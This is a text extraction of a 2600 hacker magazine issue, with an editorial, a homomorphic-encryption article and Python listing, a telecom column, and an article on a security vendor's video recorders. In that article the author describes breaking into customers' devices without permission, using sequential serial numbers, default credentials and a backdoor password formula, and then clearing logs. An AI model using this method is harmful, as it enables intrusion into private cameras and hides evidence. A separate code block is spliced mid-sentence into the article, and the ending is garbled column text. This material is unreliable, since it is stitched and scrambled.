
2600 The Hacker Quarterly - Volume 36 Issue 3 - Autumn 2019 PDF

35 Pages·2019·38.709 MB·English

Preview 2600 The Hacker Quarterly - Volume 36 Issue 3 - Autumn 2019

CONTENTS

Eurasian Payphones
Our Audacity
Fully Homomorphic Encryption and Privacy
Who Is Watching Us?
TELECOM INFORMER
The Mysteries of the Hidden Internet  15
Breaking DirecTV's DVR Authentication  18
Machine Rhapsody in 2099  19
Introduction to Computer Viruses, Example in Windows Powershell  20
All You Need is... Aix  25
HACKER PERSPECTIVE  26
Twitter the Enemy  29
Student Privacy by Practice - Not by Policy
Online Thrift Stores Have Your Data  32
LETTERS  34
EFFECTING DIGITAL FREEDOM  46
Active Defenses for Industrial Espionage  47
The Infocalypse  50
Book Review: The Big Nine: Tech Titans and Their Thinking Machines
Book Review: A People's History of Computing in the United States  51
CITIZEN ENGINEER  52
The Case Against Certified Ethical Hacking  54
Thoughts on Account Enumeration  55
Arduino-Based Burglary Zone Input Tester  57
"Information is Neutral" and Other Social Myths  60
HACKER HAPPENINGS  61
MARKETPLACE  62
MEETINGS  66

EURASIAN PAYPHONES

Turkey. No question about it - this is one weird payphone to walk towards in the city of Bodrum. [...] the phone itself is more than capable of handling any dialing challenge you throw its way. Photo by Cem "camelgun" Gunal

[...] Belgrade, this basic card-only model is operated by Telekom Srbija. Photo by Flipehan

Greece. An indisputably incredible sight to greet anyone who just happens to be looking for a phone. These four card-only phones (one of which is a different model) were seen around the central [...]. Photo by Sam Pursglove

Turkey. OK, something very strange is happening [...] Istanbul and are [...] a nice companion to the bird model above. And we [...]. Photo by Jon Pollack

Got foreign payphone photos for us? Email them to [email protected]. Use the highest quality settings on your digital camera! (Do not send us links as photos must be previously unpublished.)
(More photos on inside back cover)

OUR AUDACITY

We've admittedly never known when to quit. People have been advising us to since even before we got started. You may be somewhat familiar with the thought process: play it safe, don't make waves, lead a comfortable and uneventful life. It just wasn't for us - and, we know, not for so many of those reading this.

We've faced all kinds of struggles and challenges throughout our existence, many of which could have tipped the balance if we weren't fairly stubborn and we didn't have support from so many in the hacker world. The steady decline of the print market, the loss of bookstores, distributors who disappeared with our money more times than we can count, and, of course, increased printing costs. To even survive without the help of advertisers is a testament to the loyalty and the strength of our readers. You make the impossible happen - and have for some time.

Then there's HOPE. This unique project has brought together many thousands from around the world for 12 truly amazing conferences in New York. We've seen it expand steadily over the years, as we've seen the attendees and the hacker community grow, mature, and flourish. We don't have the space to list the many uphill battles involved in organizing these things, but what we see after each event has always filled us with tremendous pride.

Hackers On Planet Earth started as yet another crazy idea of how a European-style gathering of hackers should also be able to happen in the States. Before our first conference, the largest hacker get-togethers were just that: get-togethers mostly of people who already knew each other. And those were great and extremely important in helping to construct what followed. In fact, it was the cancellation of one of those intimate gatherings (Summercon) in 1994 that led to the birth of HOPE as a one-time replacement. From that point, the landscape started to change and big hacker conferences began to spread and thrive. Today, Defcon in Las Vegas regularly gets over 20,000 people to show up, yet for the most part has managed to stay true to the hacker spirit that's been there from the beginning. And HOPE made its own history, expanding the horizons of what constitutes hacking, bringing in speakers like Jello Biafra, Daniel Ellsberg, and the Yes Men to join hacker legends like Steve Wozniak, Kevin Mitnick, and Richard Stallman. Concepts and goals like hacktivism, the Tor Project, hackerspaces, and SecureDrop all had early audiences at HOPE conferences, and enthusiastic ones at that. In addition to the tech, we mixed in discussions of justice and empowerment. Over the years, we've managed to give the stage to well over 1000 speakers. We saw the community grow, become more inclusive and representative of gender, and open a continuing dialogue on how to do better. Instead of running from the controversy, we openly embraced it - and found that it made us stronger. And the best part was that most of our attendees really seemed to get that.

Of course, the apparent loss of our hotel has really thrown a wrench into things. From the beginning, all but one of the HOPE conferences has been held at the Hotel Pennsylvania in Manhattan. Being right in the middle of midtown certainly had its advantages. But when we were recently confronted with a tripling of the price we were paying, we knew that HOPE couldn't remain there, at least not without fundamentally changing what HOPE was. We never wanted to price ourselves out of the reach of many of our attendees. Accessibility has always been one of our passions and losing that would be a really bitter pill to swallow.

When we broke the news in late July, we expected to hear messages of support. But we were absolutely floored by the amount. What's more, we were unprepared at how many people wanted to support the conference regardless of where it was. A significant number actually said they would prefer it if we weren't located in Manhattan, where everything tends to be more expensive. All kinds of ideas have been sent to us, including alternative venues, conference formats, and logistical ideas we had never even thought of before. In short, the hacker community helped to rejuvenate our passion and motivated us to really spare no effort in figuring out how we could make this work.

It's easy to forget sometimes, even when you're in the midst of it, how amazing things can continue to happen when the right people are working with you. We're used to being told that something is impossible - and then doing it anyway. That's how we've felt about all of our conferences so far, because everyone knew it simply wasn't possible to pull something like that off. But we've never been particularly practical or big fans of constricting rules and conformity. This annoys the hell out of some people, but we're fairly used to that reaction to most of the things we do. Plus, it's always good to be annoying the right people.

As we go to press, we're not yet at the stage where we know what's going to happen in the summer of 2020, which is when the next HOPE conference was supposed to be held. By the time this issue comes out, we should have a good idea one way or another what the future of HOPE will be. So we're setting a date of Monday, October 21st to share this information with the world. We will post an announcement at www.hope.net and www.2600.com on that day. And while we can't say for sure at this point whether this will be good or bad news, we can say that we've got the very best people working on this and that we have the support of many others around the world. And when you've got all that on your side, it's very hard for magic not to occur.

Statement, required by 39 USC 3685, showing the ownership, management, and circulation of 2600 Magazine, published quarterly (4 issues) for October 1, 2019. Annual subscription price $29.00.
1. Mailing address of known office of publication is Box 752, Middle Island, New York 11953.
2. Mailing address of the headquarters or general business offices of the publisher is 2 Flowerfield, St. James, NY 11780.
3. The names and addresses of the publisher, editor, and managing editor are: Publisher and Editor: Emmanuel Goldstein, Box 99, Middle Island, New York 11953. Managing Editor: Eric Corley, 2 Flowerfield, St. James, NY 11780.
4. The owner is Eric Corley, 2 Flowerfield, St. James, NY 11780.
5. Known bondholders, mortgagees, and other security holders owning or holding 1 percent or more of total amount of bonds, mortgages, or other securities are: none.
6. Extent and nature of circulation (two figures per line as printed; only the legible ones are given):
   A. Total number of copies: [...]
   B. Paid and/or requested circulation:
      1. Paid/requested outside-county mail subscriptions: 4481, 4566
      2. Paid in-county subscriptions: 0
      3. Sales through dealers and carriers, street vendors, and counter sales: 20283, 19580
      4. Other classes mailed through the USPS: 0
   C. Total paid and/or requested circulation: 24764, 24146
   D. Free distribution by mail and outside the mail (outside-county, in-county, other classes mailed through the USPS): [...]
   G. Copies not distributed; H. Total; I. Percent paid: [...]
7. I certify that the statements made by me above are correct and complete. (Signed) Eric Corley, Owner.

Page 4, 2600 Magazine, Autumn 2019

FULLY HOMOMORPHIC ENCRYPTION AND PRIVACY
by Thor Mirchandani

In the modern world, people are becoming more and more dependent on using other people's computers for their storage and computing needs. Cloud technologies, phone apps, and Software as a Service (SaaS) are just a few examples of applications that rely on other people's machines. Most people understand the absolute necessity for securing their data in the Cloud and rely on using some form of encryption. Unfortunately, encrypting data in transit or on a cloud disk using most of the common encryption algorithms is not sufficient to ensure privacy.

When you browse, view, or manipulate the data, it is decrypted to plain text and becomes visible to a sufficiently privileged software program. Can you really know for sure who else is using your cloud instance?

Even on a hardened system, data can be read directly from CPU registers and data buses by a motivated attacker. If that sounds far-fetched, this is exactly how hardware hacker extraordinaire Bunnie Huang hacked the Xbox! For more trivial examples, consider the technical underpinnings of Kraftwerk's 1981 song "Pocket Calculator." If individuals can do it, what are the capabilities of more well-funded organizations?

Fully Homomorphic Encryption

The bottom line is that to be usable, information encrypted with traditional methods has to be visible in plain text at some point, if only for a brief moment. Another way to look at it is that a man-in-the-middle attack is always possible as long as the attacker is creative when it comes to defining where the "middle" is!

Does it have to be that way? What if we could reliably manipulate encrypted information without ever decrypting it? Turns out that we can. Enter Fully Homomorphic Encryption (FHE). FHE is a class of ciphers that have the interesting quality that an arbitrary computation on ciphertexts generates an encrypted result which, when decrypted, matches what you would see had the same computations been performed on the plaintext. Sounds like black magic, doesn't it?

Theoretical FHE systems were postulated in the late 1970s. In the following decades, researchers implemented systems that permitted a limited number and limited types of computations. Then in 2009, Craig Gentry described a system that could perform any computation, albeit very slowly. Basic computations would take hours! But it didn't take long for Gentry and other researchers to come up with implementations many orders of magnitude faster. Those systems are finding practical uses today. (Crypto Trivia: Craig Gentry received a MacArthur Genius Award for his work on encryption.)

A Practical SaaS Example

One application for FHE is SaaS. Alice might have valuable data and Bob might have a valuable algorithm. Neither wants to reveal their "secret sauce" to the other. With traditional encryption methods, this would not be possible: The algorithm would have to operate on plaintext data, and Alice and Bob would have to duke it out regarding who should lift the skirt. Typical solutions to the dilemma involve lawyers and NDAs.

Moments before he took his last breath, Alice's grandfather gave her three top secret numbers that will lead to the map coordinates of the spot where his treasure is hidden. To get the real coordinates, Alice must add two of the numbers and multiply the third by a constant. Alas, while cryptographically savvy, Alice is arithmetically challenged and has to enlist outside help. Fortunately, Bob runs a service that can add and multiply encrypted numbers. Alice agrees to send Bob her FHE encrypted numbers. Bob will then perform the calculations on the two numbers without ever seeing them in plaintext. Calculations completed, Bob returns the encrypted results to Alice without ever seeing the plaintext results. When Alice gets the results, she can simply decrypt them to get the coordinates.

We are implementing this interaction in Python - see the listing for fullyhomo.py that follows this article. The code was written for Python 3, but should work fine with Python 2 as well. It will run on Ubuntu Linux using any one of the following three commands:

./fullhomo.py
python3 fullhomo.py
python fullhomo.py

Similar commands are available on Windows. Here is a typical output from running the program:

~/projects/homomorphic$ ./fullyhomo.py
SaaS Example:
Alice wants to use Bob's calculation service to calculate 5 + 10
She encrypts 5
...and the encrypted value is 408231311223330758911876050904...
She then encrypts 10
...and the encypted value is 6811593647043826157618544194678...

Alice also wants to to multiply 6 with the constant 3
She encrypts 6
...and the encrypted value is 275872367736262799842862895600...

Then Alice sends the encrypted values to Bob along with her public key

Bob adds the two encrypted values without knowing what they are
the encrypted result is 3509690235178988491246734744677382694...
Bob multiplies the third encrypted value with the constant
the encrypted result is 8919545079897387397953169089569936011...

Bob sends the encrypted results back to Alice
Alice uses her private key to view the plain text results:
Addition: 15
Multiplication: 18

Armed with the coordinates, Alice packs her shovel and books a trip to Niger. Or did he mean Mauritania? Or maybe Namibia? Surely the treasure isn't in the middle of the Atlantic?!?! East versus West, North versus South, these things do matter!

The Code

The Python code implements an FHE algorithm called the Paillier cryptosystem. To keep things brief and simple, the code only implements the operations required for the addition and multiplication operations. Also, the key pair is hard coded for the sake of simplicity. A full fledged implementation would provide code to generate random keys.

The class FullyHomoCipher on line 14 is the Paillier encryption code. The class BobsCalculationService on line 54 defines the operations for addition and multiplication of Paillier-encrypted values. Our treasure hunt adventure starts on line 75 and uses the two classes described above. The code is extensively commented in order to make it easy for the interested reader to modify and experiment.

A note of caution for readers that aren't familiar with the Python language: Unlike most other languages, Python is white-space sensitive, and indentation matters. It's important to preserve the indentation or the program will not execute properly.

FHE Now and Tomorrow

Our SaaS example is obviously a toy, but that's to be expected from about 140 lines of commented Python code. More robust, fully featured FHEs built around stronger algorithms are finding new applications every day.

Software as a Service is only one application that's a good match for FHE. Other types of applications include smart contracts, block chain systems, data mining, "vanity" hashes, end-to-end encrypted database queries, anonymous identity systems, data integrity verification, and so on. With the rapid development in the field, we can expect many other uses in the very near future. FHE is currently deployed across several industries and problem domains, including electronic voting systems, genomics, and payment systems, and we predict widespread adoption in areas such as health care, smart power grids, and finance to take place very soon.

fullyhomo.py (the listing as printed; the scan was partly illegible, so the key digits below are transcribed from it, n2 is recomputed as n*n because the printed value could not be read, and the lines marked "reconstructed" were supplied from the surrounding code):

#!/usr/bin/env python3
import random

# Alice's Private/Public key pair, hard coded for simplicity
# (digits transcribed from the scan)
class PrivateKey():
    lambdA = 73842165240981452554905699590449542088961757004289873177979834078905122488912
    mu = 14623866067924162049758185900912462985982902037214491087468255488155427133263

class PublicKey():
    n = 73842165240981452554905699590449542089513117936657660262085094366199671389241
    n2 = n * n   # the printed n2 was illegible in the scan; Paillier uses n2 = n squared
    g = 73842165240981452554905699590449542089513117936657660262085094366199671389242

# Alice's Implementation of a fully homomorphic Paillier cipher
class FullyHomoCipher():
    def __init__(self, a1, b1):
        self.a = a1
        self.b = b1

    # Modular exponentiation by repeated squaring
    def expCalc(self, base, exponent, modulus):
        result = 1
        while exponent > 0:
            if exponent & 1 == 1:
                result = (result * base) % modulus
            exponent = exponent >> 1
            base = (base * base) % modulus
        return result

    # Paillier encryption: g^plain * r^n mod n^2 with a random r
    def encrypt(self, pub, plain):
        while True:
            r = random.getrandbits(128)
            if r > 0 and r < pub.n:
                break
        x = self.expCalc(r, pub.n, pub.n2)
        cipher = (self.expCalc(pub.g, plain, pub.n2) * x) % pub.n2
        return cipher

    # Paillier decryption: L(cipher^lambda mod n^2) * mu mod n, L(u) = (u-1)/n
    def decrypt(self, priv, pub, cipher):
        x = self.expCalc(cipher, priv.lambdA, pub.n2) - 1
        plain = ((x // pub.n) * priv.mu) % pub.n
        return plain

    # Split m into a = m - r (mod n) and b = Enc(r); only b is a Paillier ciphertext
    def encrypt_message(self, pub, m):
        r = random.getrandbits(128)   # reconstructed: illegible in the scan
        b = self.encrypt(pub, r)      # reconstructed: illegible in the scan
        a = (m - r) % pub.n
        self.a = a
        self.b = b

    # Recover m = a + Dec(b) (mod n)
    def decrypt_message(self, priv, pub):
        plain = (self.a + self.decrypt(priv, pub, self.b)) % pub.n   # reconstructed
        return plain

# Bob's encrypted calculation service
class BobsCalculationService():
    # Add two encrypted numbers (Bob)
    def encrypted_add(self, pub, a, b):
        return a * b % pub.n2

    def sum(self, c1, c2, pub):
        a = (c1.a + c2.a) % pub.n
        b = self.encrypted_add(pub, c1.b, c2.b)
        c = FullyHomoCipher(a, b)
        return c

    # Multiply two encrypted numbers with a constant (Bob)
    def encrypted_mult(self, pub, a, n):
        return FullyHomoCipher(-1, -1).expCalc(a, n, pub.n2)

    def product(self, const, c1, pub):
        a = (c1.a * const) % pub.n
        b = self.encrypted_mult(pub, c1.b, const)
        c = FullyHomoCipher(a, b)
        return c

# THE SAAS EXAMPLE BEGINS HERE
if __name__ == '__main__':
    # Alice's Key Pair
    priv = PrivateKey()
    pub = PublicKey()

    # The top secret numbers Alice wants to use
    secretNumber1 = 5
    secretNumber2 = 10
    secretNumber3 = 6
    const = 3

    # The Cipher objects Alice uses for encryption
    alice1 = FullyHomoCipher(-1, -1)
    alice2 = FullyHomoCipher(-1, -1)
    alice3 = FullyHomoCipher(-1, -1)

    # Alice performs encryption
    print("SaaS Example:")
    print("Alice wants to use Bob's calculation service to calculate ", secretNumber1, "+", secretNumber2)
    print("She encrypts ", secretNumber1)
    alice1.encrypt_message(pub, secretNumber1)
    print("...and the encrypted value is ", alice1.a, alice1.b)
    print("She then encrypts ", secretNumber2)
    alice2.encrypt_message(pub, secretNumber2)
    print("...and the encypted value is ", alice2.a, alice2.b)
    print("")
    print("Alice also wants to to multiply ", secretNumber3, " with the constant ", const)
    print("She encrypts ", secretNumber3)
    alice3.encrypt_message(pub, secretNumber3)
    print("...and the encrypted value is ", alice3.a, alice3.b)
    print("")
    print("Then Alice sends the encrypted values to Bob along with her public key")
    print("")

    # These are the encrypted values Alice sends to Bob
    encr1_a = alice1.a
    encr1_b = alice1.b
    encr2_a = alice2.a
    encr2_b = alice2.b
    encr3_a = alice3.a
    encr3_b = alice3.b

    # Bob's Cipher objects, initialized with Alice's encrypted numbers
    # Since Bob doesn't have the private key he can't decrypt the numbers
    bob1 = FullyHomoCipher(encr1_a, encr1_b)
    bob2 = FullyHomoCipher(encr2_a, encr2_b)
    bob3 = FullyHomoCipher(encr3_a, encr3_b)

    # Addition
    print("Bob adds the two encrypted values without knowing what they are")
    result1 = BobsCalculationService().sum(bob1, bob2, pub)
    print("the encrypted result is ", result1.a, result1.b)

    # Multiplication with a constant
    print("Bob multiplies the third encrypted value with the constant")
    result2 = BobsCalculationService().product(const, bob3, pub)
    print("the encrypted result is ", result2.a, result2.b)
    print("")
    print("Bob sends the encrypted results back to Alice")
    print("Alice uses her private key to view the plain text results:")
    print("Addition: ", result1.decrypt_message(priv, pub))
    print("Multiplication: ", result2.decrypt_message(priv, pub))

WHO IS WATCHING US?
by Ray Keck

I have always taken an interest in hacking/phreaking, but never applied anything I have learned (for either good or evil purposes)... until recently, that is. A couple years ago I
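The following is an added example, not the article's fullyhomo.py and not code by Thor Mirchandani. It implements the same Paillier operations Bob's service performs, but generates its own key pair (the article hard-codes one), draws the blinding value r uniformly from Z_n* as the scheme requires, and keeps the plain Paillier ciphertext rather than the article's (m - r, Enc(r)) split. All function names are this example's own. One caveat the article's title glosses over: Paillier is additively homomorphic only. Ciphertexts can be added (multiplied mod n squared) and scaled by a public constant (exponentiation), which is all the treasure hunt needs, but the product of two ciphertexts decrypts to the sum of the plaintexts, not their product; the last function shows that.

```python
# Added example: textbook Paillier with key generation, standard library only.
import random
from math import gcd


def is_probable_prime(n, rounds=32):
    """Miller-Rabin test; adequate for generating demo keys."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1  # force size and oddness
        if is_probable_prime(cand):
            return cand


def modinv(a, m):
    """Modular inverse by the extended Euclidean algorithm."""
    r0, r1, s0, s1 = m, a % m, 0, 1
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError("not invertible")
    return s0 % m


def paillier_keygen(bits=512):
    """Return (pub, priv) with pub = (n, g, n2) and priv = (lam, mu)."""
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        if p != q and gcd(p * q, (p - 1) * (q - 1)) == 1:
            break
    n = p * q
    n2 = n * n
    g = n + 1                                      # the standard simple choice of g
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)   # lcm(p - 1, q - 1)
    # L(x) = (x - 1) // n ; mu = L(g^lam mod n^2)^-1 mod n
    mu = modinv((pow(g, lam, n2) - 1) // n, n)
    return (n, g, n2), (lam, mu)


def encrypt(pub, m):
    n, g, n2 = pub
    if not 0 <= m < n:
        raise ValueError("plaintext must be in [0, n)")
    while True:                                    # r uniform in Z_n^*, fresh per encryption
        r = random.randrange(1, n)
        if gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2


def decrypt(pub, priv, c):
    n, _, n2 = pub
    lam, mu = priv
    return (((pow(c, lam, n2) - 1) // n) * mu) % n


def add_encrypted(pub, c1, c2):
    """E(m1) * E(m2) mod n^2 = E(m1 + m2 mod n)."""
    return (c1 * c2) % pub[2]


def mul_by_constant(pub, c, k):
    """E(m)^k mod n^2 = E(k * m mod n); k is a public constant."""
    return pow(c, k, pub[2])


def treasure_hunt(pub, priv, x, y, z, k):
    """The article's scenario: Bob computes on ciphertexts, Alice decrypts."""
    cx, cy, cz = encrypt(pub, x), encrypt(pub, y), encrypt(pub, z)
    c_sum = add_encrypted(pub, cx, cy)        # Bob's step, no private key involved
    c_prod = mul_by_constant(pub, cz, k)      # Bob's step, no private key involved
    return decrypt(pub, priv, c_sum), decrypt(pub, priv, c_prod)


def ciphertext_product_is_not_multiplication(pub, priv, x, y):
    """The scheme's limit: E(x) * E(y) decrypts to x + y, never to x * y."""
    c = (encrypt(pub, x) * encrypt(pub, y)) % pub[2]
    return decrypt(pub, priv, c)


if __name__ == "__main__":
    pub, priv = paillier_keygen(512)
    print(treasure_hunt(pub, priv, 5, 10, 6, 3))                        # (15, 18)
    print(ciphertext_product_is_not_multiplication(pub, priv, 5, 10))   # 15, not 50
```

Two points worth noticing when running it: encrypting the same number twice yields different ciphertexts because r is fresh each time, which is what stops Bob from matching Alice's values against a table of guesses; and 512-bit n is for a quick demo only, since the security of Paillier rests on factoring n just as RSA's does.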
started working for a manufacturer who sold home security equipment (network video recorders, IP cameras, etc.). I have had some experience with older analog systems in the past, but this would be my first foray into the IP based world. I was one of three people working in tech support helping installers and, on occasion, end users with technical issues. It wasn't the greatest work to be doing (as tech support typically isn't), but it was a decent paycheck and close to home.

During my time of employment with the company, I had a lot of time to think about and evaluate the security of the equipment we were selling. We billed ourselves as a manufacturer to the customer, but this wasn't exactly true. The truth was that we purchased hardware from a Chinese manufacturer and rebranded it with our own logo. We also customized the firmware that was being flashed to the equipment. This information wasn't publicized, and we made it a point not to talk about it with clients, even if they had brought it up themselves. Sounds like a great business to work for, huh?

Right off the bat, this job had already felt suspect to me. While shady business practices do not necessarily translate to bad product, it was the cheaply manufactured Chinese hardware (or rather the embedded software) that was the issue. This was particularly evident to me about once a year when we would go through a flood of calls regarding hacked machines and user accounts. The reason these machines would get hacked so frequently was because of vulnerabilities found in the firmware.

This, of course, isn't anything new to technology. It has always been a cat and mouse game between hackers and firmware developers since the dawn of time. Take, for example, the Xbox 360 when hackers modified DVD-ROM firmware to play game backups on their machines. Microsoft threw everything they could at people modifying their consoles to thwart these attempts. But what resulted was a back and forth game between both parties involved, with Microsoft continuously patching, updating, and swapping hardware. The difference here is that the cheap Chinese manufacturer put forth much less of an effort to secure their products.

For years they used very simple algorithms to generate backdoor passwords with information that was widely available on the Internet to those who were interested. The backdoors were intended for people who forgot their passwords. But rather than give them a way to do it on their own (like a password reset link on the web interface landing page), all they had to do was call us. The backdoor codes were generated something like this: 8888 x day x month x year, the last six digits were the password. We only generated those backdoor passwords for installers and law enforcement, which was supposed to curb them from falling into the wrong hands.

This was a fine idea in the beginning, but ended up being half-baked in the end. This was because we had no way to verify the identity of the person calling. Anyone could call in and say that I am "Mr SoAndSo" with "Fake-Company" and tell us "I need a backdoor for Serial Number xxxxx" and they would have no trouble getting it. This, of course, has since been patched with stronger algorithms to keep people from generating their own passwords. But people calling in to get passwords still remained an issue. Oftentimes when companies install security equipment, they leave default settings on them. Way too many calls started out with "I can't get into my NVR anymore using the credentials of admin:admin." Is this an end user problem? Sure it is, to an extent. But when installers lack the technical knowledge [...]

[...] This allows people with little or no networking knowledge to set up their equipment for remote access by scanning a 2D barcode or inputting the serial number into some software so that they can view their cameras remotely. Fortunately for me, the serial numbers were created sequentially, which made it easy to find potential targets by running through them in order. I started with a known serial number and incremented it by one every time I made a login attempt. The admin account on the machines cannot be deleted (another vulnerability), so that all I had to worry about was getting the password correct. I started by trying the default password of "admin" first. If I couldn't get in this way, I would then try generating a backdoor. (The backdoor passwords were supposed to be local access only, and didn't work through the web interface.) This was so all logins that I performed were using the client software (yet another vulnerability). I found that after several attempts on 30 different machines, I was able to successfully get into six of them. This is definitely a high enough number to raise some concern to management (or so I thought). I cleared the event logs on the systems before exiting so that any evidence of my entry was removed. White hatters will sometimes change the OSD (on screen display) to display something like "HACKED" so that the user is aware of what happened without ever taking complete control. It also serves as a warning of potential danger if the problem is left ignored.

In theory, I probably could have maintained access to these machines for months, or even [...], by taking over their accounts. [...]

[...] behind a firewall. And finally, check event logs often. Most hackers don't bother to clear them when they are finished with their dirty work. A lot of home routers keep records of this kind of activity as well. If you absolutely have to keep ports open, avoid using port 80 for http traffic and don't use default TCP settings. Also, variants of port 80 are bad (8080, 8000, etc.) and shouldn't be used either. Keep in mind that the http ports aren't usually required for viewing, but for remote management purposes only.

When a security company can't seem to get "security" right, it makes you question how secure anything really is. But what makes this so significant is that it is an invasion of privacy, a scary reality of the modern world, and it has to make one ponder the question: "Who is watching us?"

Does the release of a new issue always seem to catch you by surprise? Why not avoid the chaos and subscribe? Still only $29 a year in the States and Canada, $41 elsewhere. Send check or money order in US funds to 2600, PO Box 752, Middle Island, NY 11953 USA or visit our store at store.2600.com! And check out our new store guide at www.2600.com so you can always know where the nearest copy of 2600 is!

TELECOM INFORMER

Hello, and greetings from the Central Office! It's moving day, by which I mean another filthy CLEC, hanging on by its fingernails for years, has finally gone out of business and is moving their junky old equipment out. Of course, we were kind enough to provide their customers with uninterrupted service. Naturally, we're charging them full price as well. [...]

[...] state tariffs, we had to continue providing them service, but not enough to ever have a profitable business or ever fix anything that was wrong with their network.

Over the years, we have managed to move many of our services out of the "regulated" side of the house to the "unregulated" side. Essentially, any modern broadband, or service delivered via the modern broadband network, is unregulated which means that we aren't required to file rates, comply with tariffs, or provide services anywhere that isn't convenient for us to do so (sorry, but you won't be getting 100Mbps Internet at your trailer a few miles outside of Tenino - we'll sell you a POTS line and you can try dial-up instead). Additionally, depending upon the state, traditional wireline services bundled with modern broadband services are also often unregulated, meaning we can undercut CLECs wholesale (get it?). They aren't entitled to share these networks (thanks, FCC!) and they aren't tariffed so they can't receive a discount. In fact, they don't have access to these services from us at all. So, as more and more telephony has moved to VoIP and is carried over broadband networks, CLECs have found it harder and harder to compete. And [...]

[...] companies make the slimiest COCOT provider look legitimate. Many telecommunications contracts negotiated by these providers offered a revenue share with jails and prisons (yes, including privately operated, for-profit prisons). This created an incentive for prison phone companies to charge high fees and per-minute pricing and imposed - in effect - a tax on the families of inmates.

Bowing to political pressure in 2013, after a series of proposed rulemakings, the FCC initially capped rates on interstate calls at 21 cents per minute for prepaid calls, and 25 cents per minute for collect calls. In 2015, prison phone providers were further restricted to maximum charges on the following ancillary fees:
• Taxes and regulatory fees: Actual tax rate with no markup
• Automated payment fees (via phone system, website, or kiosk): $3.00
• Live agent fee (wherein a live agent processes a payment): $5.95
• Paper bill/statement fee: $2.00
• Third-party financial transaction fee (such as Western Union): Pass-through at actual cost.

The FCC also imposed some rules around creating prepaid accounts. In order to avoid game playing to generate excessive payment fees, prison phone providers weren't allowed to impose a prepaid account maximum below $50. In 2015, the FCC also set lower maximum rates:
• State or federal prisons: 11 cents/minute
• Jails with 1,000 or more inmates: 14 cents/minute
• Jails with 350-999 inmates: 16 cents/minute
• Jails of up to 349 inmates: 22 cents/minute

The payment providers charge a higher fee than normal for payments to prison phone accounts, so they can rebate a portion of the fee to the prison phone provider. Additionally, some prison phone providers have invented additional services such as voicemail, for which they charge extra at unregulated rates. Finally, services such as video calling (which has replaced in-person visitation at many facilities) cost whatever prison phone providers want to charge. Kickbacks are rife in the industry, despite the obvious conflict of interest. The Prison Policy Initiative discovered some common patterns of kickbacks:
• Paying the facility a "signing bonus" for the contract.
• Paying annual or monthly "administrative fees."

THE MYSTERIES OF THE HIDDEN INTERNET
by Tim Tepatti
tim@tepatti.com

The Internet today feels very open and accessible. But the Internet seems to have lost its mystery and charm. Before, you never knew what you would run into - you could search a new term and find a fan site completely dedicated to the topic. Search "canadian owls" and you might find a website created by a researcher, someone who had spent years of their life perfecting their research and knowledge [...]

[...] kitchen. There are no types of food from the owner's country, and there are no recipes that have been passed down for generations. And let's not forget the reason McDonald's is like that: they're trying to make a profit. They're not expanding due to their love of food and a need to share it with the world; McDonald's is expanding and opening new stores because people think "I bet people in this area would buy McDonald's - I think I could make money by owning a franchise here." Let's switch back to websites.
Many of The prison phone providers immediately Providing phone-related technology, like cell- edge, someone who had spent hours and them aren’t driven by a love for what they do; sued, and the court granted a stay of the new rates phone jamming equipment or call recording hours creating this Internet-accessible portal they’re driven by a love for profits. Perhaps going into effect. Accordingly, rates were frozen equipment. into their depth of knowledge. But today, that owls weren’t the best example - let’s do the at the 2013 interstate rates. Providing computer equipment for correc- feeling and mystery is almost completely gone. total opposite and look at some anime. If you In 2016, the FCC adjusted its proposed Google search for Sailor Moon, an extremely tions staff, law libraries, and religious Search “canadian owls” and what are you maximum interstate rates, in an attempt to moot services. greeted with? Many large websites operated by well-known anime from the past decade, the earlier litigation: you'll get a lot of search results. Wikipedia, Paying exorbitant “rent” for the vendor’s foundations and companies. Sure, they have e2apfgr0¢¢¢¢f a o1eiv3cnTit JJJmS h.adaati ieiieianlllg ntrsssAurtes tcae recnwowosef toiari tfter gtafhdudahotf p iiree t nnd3 a gte 15rorl, a0siay0t-tl3med0,a9 4sim0 y.99d e p n9drr’ ooaiitirftsa n eiotmsnntm aemshotle:awrer ytoesee r:nm s1k ea3:s. wi iu 3 nnec12 edme1r,adn ac tP tteercseansisfe/n:ts rnmd osoti ng/zsn ome/t1uini9hmtn en° ie gunp catctuhe eotnoiu tenntrsht et/eo tftcpiahhafnahealfvom tlie neplInnseeiant a a qwiitmuegenoepridgnur a ept od movdaeriinmodngdtcefooaeith wunrona nsnairp. 
